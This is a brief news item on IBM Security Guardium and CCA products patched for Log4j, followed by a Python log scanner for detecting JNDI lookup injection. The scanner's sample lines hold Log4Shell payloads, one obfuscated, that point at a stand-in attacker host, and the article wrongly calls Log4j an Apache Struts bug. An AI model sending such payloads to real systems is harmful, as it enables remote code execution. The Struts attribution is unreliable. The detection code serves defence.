Log4j is continuing to sting big names in the IT industry, with IBM the latest to discover products vulnerable to the Apache Struts logging bug.
Security Guardium versions 10.5, 10.6, and 11.0 through 11.4 are affected, because they use the Log4j library in their logging infrastructure.
IBM’s fix for Security Guardium is an appliance patch which the company says replaces Log4j 1.x with Log4j2 V2.17.1.
In the IBM Common Cryptographic Architecture (CCA), the Log4j bugs affect the Crypto Hardware Initialization and Maintenance (CHIM).
As with Security Guardium, the fix for CCA replaces Log4j 1.x with Log4j2 V2.17.1.
As iTnews explained when the Log4j vulnerability was first discovered: “When a vulnerable application writes to a log file, the default Log4j configuration means the library looks up a server which, if an attacker controls it, can be set to send a malicious response from that system.
“The response can contain a remote Java class file which is injected into the server process and executed with the same privileges as the vulnerable application using the logging library.”
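A log-scanning check for the lookup expressions the quoted explanation describes, added here as an example (it is not code from the article, iTnews or IBM): it collapses Log4j's nested `${...}` lookups so that an outer `${jndi:...}` expression becomes visible, then flags the line. The sample log lines and the `attacker.example` hostnames are constructed.

```python
import re

# Constructed sample log lines: one benign request, one carrying a plain JNDI
# lookup, one where the "jndi" name is assembled from a nested lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://attacker.example/x}"',
]

# An innermost ${...} expression: its body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The expression we want to surface, matched after normalisation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(expr: str) -> str:
    """Evaluate one innermost lookup the way Log4j's substitutor would for the
    case-changing and default-value forms; anything else resolves to nothing."""
    if ":" in expr:
        name, _, arg = expr.partition(":")
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
    if ":-" in expr:                      # ${unknown:-fallback} yields "fallback"
        return expr.split(":-", 1)[1]
    return ""


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups inside-out until the text stops changing, e.g.
    ${${lower:j}ndi:...} -> ${jndi:...}; a ${jndi:...} itself is left intact."""
    for _ in range(max_rounds):
        def repl(m):
            return m.group(0) if m.group(1).lower().startswith("jndi:") else _resolve_inner(m.group(1))
        new_text = _INNER.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalised_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((n, norm))
    return hits
```

Run it over a web-server or application log that is fed into a Log4j 2.x (pre-2.17.1) appender to see which requests would have triggered a lookup.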